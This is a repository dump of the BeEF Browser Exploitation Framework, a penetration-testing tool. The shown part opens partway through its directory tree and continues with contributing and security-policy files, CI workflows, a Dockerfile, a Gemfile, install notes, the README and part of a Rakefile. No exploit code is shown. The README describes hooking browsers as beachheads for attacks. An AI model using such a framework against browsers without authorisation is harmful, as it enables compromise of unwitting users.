│ │ │ │ ├── print_spec.rb
│ │ │ │ ├── security_spec.rb
│ │ │ │ └── string_spec.rb
│ │ │ └── settings_spec.rb
│ │ ├── extensions/
│ │ │ ├── adminui_spec.rb
│ │ │ ├── dns_spec.rb
│ │ │ ├── network_spec.rb
│ │ │ ├── proxy_spec.rb
│ │ │ ├── qrcode_spec.rb
│ │ │ ├── requester_spec.rb
│ │ │ ├── social_engineering_spec.rb
│ │ │ ├── webrtc_spec.rb
│ │ │ ├── websocket_hooked_browser_spec.rb
│ │ │ ├── websocket_spec.rb
│ │ │ └── xssrays_spec.rb
│ │ ├── filesystem_checks_spec.rb
│ │ ├── modules/
│ │ │ └── debug/
│ │ │ └── test_beef_debugs_spec.rb
│ │ └── security_checks_spec.rb
│ ├── features/
│ │ ├── all_modules_spec.rb
│ │ └── debug_modules_spec.rb
│ ├── requests/
│ │ ├── beef_test_spec.rb
│ │ └── login_spec.rb
│ ├── spec_helper.rb
│ └── support/
│ ├── assets/
│ │ ├── config_new.yaml
│ │ └── config_old.yaml
│ ├── beef_test.rb
│ ├── browserstack/
│ │ ├── osx/
│ │ │ ├── catalina/
│ │ │ │ ├── catalina_chrome_41.config.yml
│ │ │ │ ├── catalina_chrome_59.config.yml
│ │ │ │ ├── catalina_chrome_81.config.yml
│ │ │ │ ├── catalina_firefox_11.config.yml
│ │ │ │ ├── catalina_firefox_68esr.config.yml
│ │ │ │ ├── catalina_firefox_75.config.yml
│ │ │ │ └── catalina_safari_13.config.yml
│ │ │ ├── elcapitan/
│ │ │ │ ├── elcapitan_chrome_14.config.yml
│ │ │ │ ├── elcapitan_chrome_81.config.yml
│ │ │ │ ├── elcapitan_firefox_7.config.yml
│ │ │ │ ├── elcapitan_firefox_75.config.yml
│ │ │ │ └── elcapitan_safari_9-1.config.yml
│ │ │ └── snowleopard/
│ │ │ ├── snowleopard_chrome_14.config.yml
│ │ │ ├── snowleopard_chrome_35.config.yml
│ │ │ ├── snowleopard_chrome_49.config.yml
│ │ │ ├── snowleopard_firefox_38esr.config.yml
│ │ │ ├── snowleopard_firefox_42.config.yml
│ │ │ ├── snowleopard_firefox_7.config.yml
│ │ │ └── snowleopard_safari_5-1.config.yml
│ │ └── windows/
│ │ ├── win10/
│ │ │ ├── win10_chrome_37.config.yml
│ │ │ ├── win10_chrome_59.config.yml
│ │ │ ├── win10_chrome_81.config.yml
│ │ │ ├── win10_edge_81.config.yml
│ │ │ ├── win10_firefox_32.config.yml
│ │ │ ├── win10_firefox_68esr.config.yml
│ │ │ ├── win10_firefox_75.config.yml
│ │ │ └── win10_ie_11.config.yml
│ │ ├── win8/
│ │ │ ├── win8_chrome_22.config.yml
│ │ │ ├── win8_chrome_81.config.yml
│ │ │ ├── win8_edge_81.config.yml
│ │ │ ├── win8_firefox_32.config.yml
│ │ │ ├── win8_firefox_75.config.yml
│ │ │ └── win8_ie_10.config.yml
│ │ └── xp/
│ │ ├── xp_chrome_14.config.yml
│ │ ├── xp_chrome_28.config.yml
│ │ ├── xp_chrome_43.config.yml
│ │ ├── xp_firefox_16.config.yml
│ │ ├── xp_firefox_26.config.yml
│ │ ├── xp_firefox_45.config.yml
│ │ └── xp_ie_7.config.yml
│ ├── constants.rb
│ ├── simple_rest_client.rb
│ └── ui_support.rb
├── test/
│ ├── integration/
│ │ ├── tc_debug_modules.rb
│ │ ├── tc_dns_rest.rb
│ │ ├── tc_network_rest.rb
│ │ ├── tc_proxy.rb
│ │ ├── tc_social_engineering_rest.rb
│ │ ├── tc_webrtc_rest.rb
│ │ └── ts_integration.rb
│ └── thirdparty/
│ └── msf/
│ └── unit/
│ ├── BeEF.rc
│ ├── tc_metasploit.rb
│ └── ts_metasploit.rb
├── tools/
│ ├── bump-version.sh
│ ├── csrf_to_beef/
│ │ ├── csrf_to_beef
│ │ ├── lib/
│ │ │ ├── module.rb
│ │ │ └── output.rb
│ │ └── sample.html
│ ├── maintenance/
│ │ └── copyright_update.rb
│ └── rest_api_examples/
│ ├── autorun
│ ├── browser-details
│ ├── clone_page
│ ├── command-modules
│ ├── dns
│ ├── export-logs
│ ├── lib/
│ │ ├── beef_rest_api.rb
│ │ ├── print.rb
│ │ └── string.rb
│ ├── metasploit
│ ├── network
│ ├── remove-offline-browsers
│ ├── webrtc
│ └── xssrays
└── update-beef
================================================
FILE CONTENTS
================================================
================================================
FILE: .dockerignore
================================================
# Don't copy over git files
.git
.github
.gitignore
doc
docs
test
update-beef
================================================
FILE: .github/CONTRIBUTING.md
================================================
# Contributing
### Anyone is welcome to make BeEF better!
Thank you for wanting to contribute to BeEF. It's effort like yours that helps make BeEF such a great tool.
Following these guidelines shows that you respect the time of the developers developing this open source project and helps them help you. In response to this, they should return that respect in addressing your issue, assisting with changes, and helping you finalize your pull requests.
### We want any form of helpful contributions!
BeEF is an open source project and we love to receive contributions from the community! There are many ways to contribute, from writing tutorials or blog posts, improving or translating the documentation, answering questions on the project, submitting bug reports and feature requests or writing or reviewing code which can be merged into BeEF itself.
# Ground Rules
### Responsibilities
> * When making an issue, ensure the issue template is filled out, failure to do so can and will result in a closed ticket and a delay in support.
> * We now have a two-week of unresponsiveness period before closing a ticket, if this happens, just comment responding to the issue which will re-open the ticket. Ensure to make sure all information requested is provided.
> * Ensure cross-platform compatibility for every change that's accepted. Mac and Linux are currently supported.
> * Create issues for any major changes and enhancements that you wish to make. Discuss things transparently and get community feedback.
> * Ensure language is as respectful and appropriate as possible.
> * Keep merges as straightforward as possible, only address one issue per commit where possible.
> * Be welcoming to newcomers and try to assist where possible, everyone needs help.
# Where to start
### Looking to make your first contribution
Unsure where to begin contributing to BeEF? You can start by looking through these issues:
* Good First Issue - issues which should only require a few changes, and are good to start with.
* Question - issues which are a question and need a response. A good way to learn more about BeEF is to try to solve a problem.
At this point, you're ready to make your changes! Feel free to ask for help; everyone is a beginner at first.
If a maintainer asks you to "rebase" your PR, they're saying that code has changed, and that you need to update your branch so it's easier to merge.
### Ruby best practise
Do read through: https://rubystyle.guide
Try and follow through with the practices throughout, even going through it once will help keep the codebase consistent.
Use Rubocop to help ensure that the changes adhere to current standards, we are currently catching up old codebase to match.
Just run the following in the /beef directory.
> rubocop
# Getting started
### How to submit a contribution.
1. Create your own fork of the code
2. Checkout the master branch
> git checkout master
3. Create a new branch for your feature
> git checkout -b my-cool-new-feature
4. Add your new files
> git add modules/my-cool-new-module
5. Modify or write a test case/s in Rspec for your changes
6. Commit your changes with a relevant message
> git commit
7. Push your changes to GitHub
> git push origin my-cool-new-feature
8. Run all tests again to make sure they all pass
9. Edit existing wiki page / add a new one explaining the new features, including:
- sample usage (command snippets, steps and/or screenshots)
- internal working (code snippets & explanation)
10. Now browse to the following URL and create your pull request from your fork to beef master
- Fill out the Pull Request Template
- https://github.com/beefproject/beef/pulls
# How to report a bug
If you find a security vulnerability, do NOT open an issue. Email security@beefproject.com instead.
When the security team receives a security bug email, they will assign it to a primary handler.
This person will coordinate the fix and release process, involving the following steps:
* Confirm the problem and find the affected versions.
* Audit code to find any potential similar problems.
* Prepare fixes
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Report a bug to help us improve BeEF
---
## First Steps
1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
2. Confirm that the wiki does not contain the answers you seek: https://github.com/beefproject/beef/wiki
3. Check the FAQ: https://github.com/beefproject/beef/wiki/FAQ
4. BeEF Version:
5. Ruby Version:
6. Browser Details (e.g. Chrome v81.0):
7. Operating System (e.g. OSX Catalina):
## Configuration
1. Have you made any changes to your BeEF configuration? Yes/No
2. Have you enabled or disabled any BeEF extensions? Yes/No
## Steps to Reproduce
1. (eg. I ran install script, which ran fine)
2. (eg. when launching console with './beef' I get an error as follows: <error here>)
3. (eg. beef does not launch)
## How to enable and capture detailed logging
1. Edit `config.yaml` in the root directory
* If using Kali **beef-xss** the root dir will be `/usr/share/beef-xss`
2. Update `client_debug` to `true`
3. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
4. Retrieve your server-side logs from `~/.beef/beef.log`
* If you have a kali (beef-xss) problem, you can submit a bug here:
https://www.kali.org/docs/community/submitting-issues-kali-bug-tracker/
**If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.**
================================================
FILE: .github/ISSUE_TEMPLATE/config.yml
================================================
blank_issues_enabled: false
contact_links:
- name: Questions / Support
url: https://github.com/beefproject/beef/wiki
about: Please check the wiki before opening an issue.
================================================
FILE: .github/PULL_REQUEST_TEMPLATE.md
================================================
# Pull Request
Thanks for submitting a PR! Please fill in this template where appropriate:
## Category
*e.g. Bug, Module, Extension, Core Functionality, Documentation, Tests*
## Feature/Issue Description
**Q:** Please give a brief summary of your feature/fix
**A:**
**Q:** Give a technical rundown of what you have changed (if applicable)
**A:**
## Test Cases
**Q:** Describe your test cases, what you have covered and if there are any use cases that still need addressing.
**A:**
## Wiki Page
*If you are adding a new feature that is not easily understood without context, please draft a section to be added to the Wiki below.*
================================================
FILE: .github/SECURITY.md
================================================
send security bug reports to security@beefproject.com
**A security report should include:**
1. Description of the problem (what it is, what's the impact)
2. Technical steps to replicate it (commands / screenshots)
3. Actionable fix/recommendations to mitigate the issue
================================================
FILE: .github/dependabot.yml
================================================
version: 2
updates:
- package-ecosystem: npm
directory: "/"
schedule:
interval: daily
open-pull-requests-limit: 10
ignore:
- dependency-name: jsdoc-to-markdown
versions:
- 7.0.0
- package-ecosystem: bundler
directory: "/"
schedule:
interval: daily
open-pull-requests-limit: 10
ignore:
- dependency-name: rubocop
versions:
- 1.10.0
- 1.11.0
- 1.12.0
- 1.12.1
- 1.9.0
- 1.9.1
================================================
FILE: .github/workflows/codeql.yml
================================================
# For most projects, this workflow file will not need changing; you simply need
# to commit it to your repository.
#
# You may wish to alter this file to override the set of languages analyzed,
# or to provide custom queries or build logic.
#
# ******** NOTE ********
# We have attempted to detect the languages in your repository. Please check
# the `language` matrix defined below to confirm you have the correct set of
# supported CodeQL languages.
#
name: "CodeQL"
on:
push:
branches: [ master ]
pull_request:
# The branches below must be a subset of the branches above
branches: [ master ]
schedule:
- cron: '36 1 * * 0'
jobs:
analyze:
name: Analyze
runs-on: ubuntu-latest
permissions:
actions: read
contents: read
security-events: write
strategy:
fail-fast: false
matrix:
language: [ 'javascript', 'ruby' ]
# CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
# Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support
steps:
- name: Checkout repository
uses: actions/checkout@v3
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL
uses: github/codeql-action/init@v2
with:
languages: ${{ matrix.language }}
# If you wish to specify custom queries, you can do so here or in a config file.
# By default, queries listed here will override any specified in a config file.
# Prefix the list here with "+" to use these queries and those in the config file.
# Details on CodeQL's query packs refer to : https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs
queries: security-extended,security-and-quality
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
# If this step fails, then you should remove it and run the build manually (see below)
# - name: Autobuild
# uses: github/codeql-action/autobuild@v2
# ℹ️ Command-line programs to run using the OS shell.
# 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun
# If the Autobuild fails above, remove it and uncomment the following three lines.
# modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance.
# - run: |
# echo "Run, Build Application using script"
# ./location_of_script_within_repo/buildscript.sh
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@v2
================================================
FILE: .github/workflows/dependabot-auto-merge.yml
================================================
name: Dependabot auto-merge
on:
pull_request:
branches:
- master
permissions:
contents: write
pull-requests: write
jobs:
dependabot:
runs-on: ubuntu-latest
if: github.event.pull_request.user.login == 'dependabot[bot]' && github.repository == 'beefproject/beef'
steps:
- name: Dependabot metadata
id: metadata
uses: dependabot/fetch-metadata@v2
with:
github-token: "${{ secrets.GITHUB_TOKEN }}"
- name: Enable auto-merge for Dependabot PRs
if: success() && (steps.metadata.outputs.update-type == 'version-update:semver-minor' || steps.metadata.outputs.update-type == 'version-update:semver-patch')
run: gh pr merge --auto --merge "$PR_URL"
env:
PR_URL: ${{ github.event.pull_request.html_url }}
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
================================================
FILE: .github/workflows/dependabot_auto_label.yml
================================================
name: 'Auto-label Dependabot PRs'
on:
pull_request_target:
branches: [ master ]
types: [ opened, synchronize ]
jobs:
auto-label:
name: 'Apply safe_to_test for Dependabot'
if: github.event.pull_request.user.login == 'dependabot[bot]'
runs-on: ubuntu-latest
steps:
- name: 'Add safe_to_test label'
uses: actions/github-script@v8
with:
script: |
const { owner, repo } = context.repo;
const issue_number = context.payload.pull_request.number;
// Remove first so re-adding always fires a labeled event,
// which triggers the BrowserStack workflow.
try {
await github.rest.issues.removeLabel({
owner, repo, issue_number,
name: 'safe_to_test'
});
} catch (e) {
if (e.status !== 404) throw e;
}
await github.rest.issues.addLabels({
owner, repo, issue_number,
labels: ['safe_to_test']
});
================================================
FILE: .github/workflows/github_actions.yml
================================================
name: 'BrowserStack Test'
on:
pull_request_target:
branches: [ master ]
types: [ labeled ]
jobs:
ubuntu-job:
name: 'BrowserStack Test on Ubuntu'
runs-on: ubuntu-latest
concurrency:
group: browserstack-${{ github.event.pull_request.number }}
cancel-in-progress: true
if: github.event.label.name == 'safe_to_test'
env:
GITACTIONS: true
steps:
- name: 'Remove safe_to_test label'
uses: actions/github-script@v8
with:
script: |
try {
await github.rest.issues.removeLabel({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: context.payload.pull_request.number,
name: 'safe_to_test'
});
} catch (e) {
if (e.status === 404) {
console.log('Label already removed, skipping');
} else {
throw e;
}
}
- name: 'BrowserStack Env Setup' # Invokes the setup-env action
uses: browserstack/github-actions/setup-env@master
with:
username: ${{ secrets.BROWSERSTACK_USERNAME }}
access-key: ${{ secrets.BROWSERSTACK_ACCESS_KEY }}
- name: 'BrowserStack Local Tunnel Setup' # Invokes the setup-local action
uses: browserstack/github-actions/setup-local@master
with:
local-testing: start
local-identifier: random
- name: 'Checkout the repository'
uses: actions/checkout@v6
with:
ref: ${{ github.event.pull_request.head.sha }}
fetch-depth: 2
- name: 'Setting up Ruby'
uses: ruby/setup-ruby@v1
# Ruby version is defined in .ruby-version file
- name: 'Update and Install Dependencies'
run: |
sudo apt update
sudo apt install libcurl4 libcurl4-openssl-dev
- name: 'Configure Bundle testing and install gems'
run: |
bundle config unset --local without
bundle config set --local with 'test' 'development'
bundle install
- name: 'Run BrowserStack simple verification'
run: |
bundle exec rake browserstack --trace
- name: 'BrowserStackLocal Stop' # Terminating the BrowserStackLocal tunnel connection
uses: browserstack/github-actions/setup-local@master
with:
local-testing: stop
================================================
FILE: .github/workflows/stale.yml
================================================
# This workflow warns and then closes issues and PRs that have had no activity for a specified amount of time.
#
# You can adjust the behavior by modifying this file.
# For more information, see:
# https://github.com/actions/stale
name: Mark stale issues and pull requests
on:
schedule:
- cron: '5 * * * *'
jobs:
stale:
runs-on: ubuntu-latest
permissions:
issues: write
pull-requests: write
steps:
- uses: actions/stale@28ca1036281a5e5922ead5184a1bbf96e5fc984e # v10.0.0
with:
repo-token: ${{ secrets.GITHUB_TOKEN }}
days-before-stale: 120
days-before-pr-stale: 29
days-before-close: 7
days-before-pr-close: 31
stale-issue-message: 'This issue has been marked as stale due to inactivity and will be closed in 7 days'
stale-pr-message: 'Stale pull request message'
stale-issue-label: 'Stale'
stale-pr-label: 'no-pr-activity'
exempt-issue-labels: 'Critical, High, Low, Medium, Review, Backlog'
exempt-all-milestones: true
exempt-draft-pr: true
start-date: '2022-06-15T00:00:00Z'
================================================
FILE: .rspec
================================================
--format documentation
--color
--require spec_helper
-I .
================================================
FILE: .rubocop.yml
================================================
AllCops:
Exclude:
- 'test/**/*'
- 'tmp/**/*'
- 'tools/**/*'
- 'doc/**/*'
TargetRubyVersion: <%= File.read(".ruby-version").strip[/^(\d+\.\d+)/, 1] || raise("Ruby version not found") %>
NewCops: enable
Layout/LineLength:
Enabled: true
Max: 180
Metrics/AbcSize:
Enabled: false
Metrics/BlockLength:
Enabled: false
Metrics/ClassLength:
Enabled: false
Metrics/MethodLength:
Enabled: false
Metrics/ModuleLength:
Enabled: false
Metrics/PerceivedComplexity:
Enabled: false
Metrics/CyclomaticComplexity:
Enabled: false
Naming/ClassAndModuleCamelCase:
Enabled: false
Style/FrozenStringLiteralComment:
Enabled: false
Style/Documentation:
Enabled: false
================================================
FILE: .ruby-gemset
================================================
beef
================================================
FILE: .ruby-version
================================================
3.4.7
================================================
FILE: Dockerfile
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
###########################################################################################################
###########################################################################################################
## ##
## Please read the Wiki Installation section on set-up using Docker prior to building this container. ##
## BeEF does NOT allow authentication with default credentials. So please, at the very least ##
## change the username:password in the config.yaml file to something secure that is not beef:beef ##
## before building or you will be denied access and have to rebuild anyway. ##
## ##
###########################################################################################################
###########################################################################################################
# ---------------------------- Start of Builder 0 - Gemset Build ------------------------------------------
FROM ruby:3.4.7-slim-bookworm AS builder
COPY . /beef
# Set gemrc config to install gems without Ruby Index (ri) and Ruby Documentation (rdoc) files.
# Then add bundler/gem dependencies and install.
# Finally change permissions of bundle installs so we don't need to run as root.
RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& apt-get update \
&& apt-get install -y --no-install-recommends \
git \
curl \
libssl-dev \
xz-utils \
pkg-config \
make \
g++ \
libcurl4-openssl-dev \
ruby-dev \
libyaml-dev \
libffi-dev \
zlib1g-dev \
libsqlite3-dev \
sqlite3 \
&& bundle install --gemfile=/beef/Gemfile --jobs=`nproc` \
&& rm -rf /usr/local/bundle/cache \
&& chmod -R a+r /usr/local/bundle \
&& rm -rf /var/lib/apt/lists/*
# ------------------------------------- End of Builder 0 -------------------------------------------------
# ---------------------------- Start of Builder 1 - Final Build ------------------------------------------
FROM ruby:3.4.7-slim-bookworm
LABEL maintainer="Beef Project" \
source_url="github.com/beefproject/beef" \
homepage="https://beefproject.com/"
# BeEF UI/Hook port
ARG UI_PORT=3000
ARG PROXY_PORT=6789
ARG WEBSOCKET_PORT=61985
ARG WEBSOCKET_SECURE_PORT=61986
# Create service account to run BeEF and install BeEF's runtime dependencies
RUN adduser --home /beef --gecos beef --disabled-password beef \
&& apt-get update \
&& apt-get install -y --no-install-recommends \
curl \
wget \
espeak \
lame \
openssl \
libreadline-dev \
libyaml-dev \
libxml2-dev \
libxslt-dev \
libncurses5-dev \
libsqlite3-dev \
sqlite3 \
zlib1g \
bison \
nodejs \
firefox-esr \
&& apt-get -y clean \
&& rm -rf /var/lib/apt/lists/*
# Install geckodriver for Selenium tests
# Pin version and verify checksum to mitigate supply chain attacks
ENV GECKODRIVER_VERSION=v0.36.0
ENV GECKODRIVER_SHA256=0bde38707eb0a686a20c6bd50f4adcc7d60d4f73c60eb83ee9e0db8f65823e04
RUN wget -q "https://github.com/mozilla/geckodriver/releases/download/${GECKODRIVER_VERSION}/geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" \
&& echo "${GECKODRIVER_SHA256} geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" | sha256sum -c - \
&& tar -xzf "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" -C /usr/local/bin \
&& chmod +x /usr/local/bin/geckodriver \
&& rm "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz"
# Use gemset created by the builder above
COPY --chown=beef:beef . /beef
COPY --from=builder /usr/local/bundle /usr/local/bundle
# Ensure we are using our service account by default
USER beef
# Expose UI, Proxy, WebSocket server, and WebSocketSecure server ports
EXPOSE $UI_PORT $PROXY_PORT $WEBSOCKET_PORT $WEBSOCKET_SECURE_PORT
HEALTHCHECK --interval=30s --timeout=30s --start-period=5s --retries=3 CMD [ "curl", "-fS", "localhost:$UI_PORT" ]
WORKDIR /beef
ENTRYPOINT ["/beef/beef"]
# ------------------------------------- End of Builder 1 -------------------------------------------------
================================================
FILE: Gemfile
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
gem 'net-smtp', require: false
gem 'json'
gem 'eventmachine', '~> 1.2', '>= 1.2.7'
gem 'thin', '~> 2.0'
gem 'sinatra', '~> 4.1'
gem 'rack', '~> 3.2'
gem 'rack-protection', '~> 4.2.1'
gem 'em-websocket', '~> 0.5.3' # WebSocket support
gem 'uglifier', '~> 4.2'
gem 'mime-types', '~> 3.7'
gem 'execjs', '~> 2.10'
gem 'ansi', '~> 1.5'
gem 'term-ansicolor', :require => 'term/ansicolor'
gem 'rubyzip', '~> 3.2'
gem 'espeak-ruby', '~> 1.1.0' # Text-to-Voice
gem 'rake', '~> 13.3'
gem 'activerecord', '~> 8.1'
gem 'otr-activerecord', '~> 2.6.0'
gem 'sqlite3', '~> 2.9'
gem 'rubocop', '~> 1.85.1', require: false
# Geolocation support
group :geoip do
gem 'maxmind-db', '~> 1.4'
end
gem 'parseconfig', '~> 1.1', '>= 1.1.2'
gem 'erubis', '~> 2.7'
# Metasploit Integration extension
group :ext_msf do
gem 'msfrpc-client', '~> 1.1', '>= 1.1.2'
gem 'xmlrpc', '~> 0.3.3'
end
# Notifications extension
group :ext_notifications do
# Pushover
gem 'rushover', '~> 0.3.0'
# Slack
gem 'slack-notifier', '~> 2.4'
end
# DNS extension
group :ext_dns do
gem 'async-dns', '~> 1.4'
gem 'async', '~> 1.32'
end
# QRcode extension
group :ext_qrcode do
gem 'qr4r', '~> 0.6.1'
end
# For running unit tests
group :test do
gem 'simplecov', '~> 0.22'
gem 'test-unit-full', '~> 0.0.5'
gem 'rspec', '~> 3.13'
gem 'rdoc', '~> 7.2'
gem 'browserstack-local', '~> 1.4'
gem 'irb', '~> 1.17'
gem 'pry-byebug', '~> 3.12'
gem 'rest-client', '~> 2.1.0'
gem 'websocket-client-simple', '~> 0.6.1'
# Note: curb gem requires curl libraries
# sudo apt-get install libcurl4-openssl-dev
gem 'curb', '~> 1.2'
# Note: selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
# gem 'selenium' # Requires old version of selenium which is no longer available
gem 'geckodriver-helper', '~> 0.24.0'
gem 'selenium-webdriver', '~> 4.41'
# Note: nokogiri is needed by capybara which may require one of the below commands
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem 'capybara', '~> 3.40'
end
source 'https://rubygems.org'
================================================
FILE: INSTALL.txt
================================================
===============================================================================
Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - https://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
Source
------
Obtain application source code either by downloading the latest archive:
$ wget https://github.com/beefproject/beef/archive/master.zip
Or cloning the Git repository from Github:
$ git clone https://github.com/beefproject/beef
Prerequisites
--------------
BeEF requires Ruby 3.0+.
If your operating system package manager does not support Ruby version 3.0,
you can add the brightbox ppa repository for the latest version of Ruby:
$ sudo apt-add-repository -y ppa:brightbox/ruby-ng
Alternatively, consider using a Ruby environment manager such as rbenv or rvm
to manager your Ruby versions. Refer to the following for more information:
* rbenv: https://github.com/rbenv/rbenv
* rvm: https://rvm.io/rvm/install
Installation
------------
Once Ruby is installed, run the install script in the BeEF directory:
./install
This script installs the required operating system packages and all the
prerequisite Ruby gems.
Upon successful installation, be sure to read the Configuration page
on the wiki for important details on configuring and securing BeEF.
https://github.com/beefproject/beef/wiki/Configuration
Start BeEF
----------
To start BeEF, simply run:
$ ./beef
Updating
--------
Due to the fast-paced nature of web browser development and webappsec landscape,
it's best to regularly update BeEF to the latest version.
If you're using BeEF from the GitHub repository, updating is as simple as:
$ ./update-beef
Or pull the latest repo yourself and then update the gems with:
$ git pull
$ bundle
================================================
FILE: README.md
================================================
===============================================================================
Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - https://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
What is BeEF?
-------------
__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
__Please, send us pull requests!__
__Web:__ https://beefproject.com/
__Bugs:__ https://github.com/beefproject/beef/issues
__Security Bugs:__ security@beefproject.com
__Twitter:__ [@beefproject](https://twitter.com/beefproject)
__Discord:__ https://discord.gg/25wT2P8pwx
Requirements
------------
* Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
* [Ruby](https://www.ruby-lang.org): 3.0 or newer
* [SQLite](http://sqlite.org): 3.x
* [Node.js](https://nodejs.org): 10 or newer
* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
* Selenium is required on OSX: `brew install selenium-server-standalone` (See https://github.com/shvets/selenium)
Quick Start
-----------
__The following is for the impatient.__
The `install` script installs the required operating system packages and all the prerequisite Ruby gems:
```
$ ./install
```
For full installation details, please refer to [INSTALL.txt](https://github.com/beefproject/beef/blob/master/INSTALL.txt) or the [Installation](https://github.com/beefproject/beef/wiki/Installation) page on the wiki.
Upon successful installation, be sure to read the [Configuration](https://github.com/beefproject/beef/wiki/Configuration) page on the wiki for important details on configuring and securing BeEF.
Documentation
---
* [User Guide](https://github.com/beefproject/beef/wiki#user-guide)
* [Frequently Asked Questions](https://github.com/beefproject/beef/wiki/FAQ)
* [JSdocs](https://beefproject.github.io/beef/index.html)
Usage
-----
To get started, simply execute beef and follow the instructions:
```
$ ./beef
```
================================================
FILE: Rakefile
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'rspec/core/rake_task'
task :default => ["short"]
RSpec::Core::RakeTask.new(:short) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack', '--tag ~run_on_long_tests']
end
RSpec::Core::RakeTask.new(:long) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack']
end
RSpec::Core::RakeTask.new(:long_only) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack', '--tag run_on_long_tests']
end
################################
# Browserstack
RSpec::Core::RakeTask.new(:browserstack) do |task|
task.rspec_opts = ['--tag run_on_browserstack']
end
RSpec::Core::RakeTask.new(:bs) do |task|
configs = Dir["spec/support/browserstack/**/*.yml"]
configs.each do |config|
config = config.split('spec/support/browserstack')[1]
ENV['CONFIG_FILE'] = config
puts "\e[45m#{config.upcase}\e[0m"
task.rspec_opts = ['--tag run_on_browserstack']
Rake::Task['browserstack'].invoke
Rake::Task['browserstack'].reenable
end
end
################################
# SSL/TLS certificate
namespace :ssl do
desc 'Create a new SSL certificate'
task :create do
if File.file?('beef_key.pem')
puts 'Certificate already exists. Replace? [Y/n]'
confirm = STDIN.getch.chomp
unless confirm.eql?('') || confirm.downcase.eql?('y')
puts "Aborted"
exit 1
end
end
Rake::Task['ssl:replace'].invoke
end
desc 'Re-generate SSL certificate'
task :replace do
if File.file?('/usr/local/bin/openssl')
path = '/usr/local/bin/openssl'
elsif File.file?('/usr/bin/openssl')
path = '/usr/bin/openssl'
else
puts "[-] Error: could not find openssl"
exit 1
end
IO.popen([path, 'req', '-new', '-newkey', 'rsa:4096', '-sha256', '-x509', '-days', '3650', '-nodes', '-out', 'beef_cert.pem', '-keyout', 'beef_key.pem', '-subj', '/CN=localhost'], 'r+').read.to_s
end
end
################################
# Generate API documentation
desc 'Generate API documentation to doc/rdocs/index.html'
task :rdoc do
Rake::Task['rdoc:rerdoc'].invoke
end
################################
# rdoc
namespace :rdoc do
require 'rdoc/task'
desc 'Generate API documentation to doc/rdocs/index.html'
Rake::RDocTask.new do |rd|
rd.rdoc_dir = 'doc/rdocs'
rd.main = 'README.mkd'
rd.rdoc_files.include('core/**/*\.rb')
#'extensions/**/*\.rb'
#'modules/**/*\.rb'
rd.options << '--line-numbers'
rd.options << '--all'
end
end
################################
# X11 set up
@xserver_process_id = nil;
task :xserver_start do
printf "Starting X11 Server (wait 10 seconds)..."
@xserver_process_id = IO.popen("/usr/bin/Xvfb :0 -screen 0 1024x768x24 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
printf '.'
sleep (i) # increase the . display rate
end
puts '.'
end
task :xserver_stop do
puts "\nShutting down X11 Server...\n"
sh "ps -ef|grep Xvfb|grep -v grep|grep -v rake|awk '{print $2}'|xargs kill"
end
################################
# BeEF environment set up
@beef_process_id = nil;
@beef_config_file = 'tmp/rk_beef_conf.yaml';
task :beef_start => 'beef' do
# read environment param for creds or use bad_fred
test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
test_pass = ENV['TEST_BEEF_PASS'] || 'bad_fred_no_access'
# write a rake config file for beef
config = YAML.safe_load(File.read('./config.yaml'))
config['beef']['credentials']['user'] = test_user
config['beef']['credentials']['passwd'] = test_pass
Dir.mkdir('tmp') unless Dir.exist?('tmp')
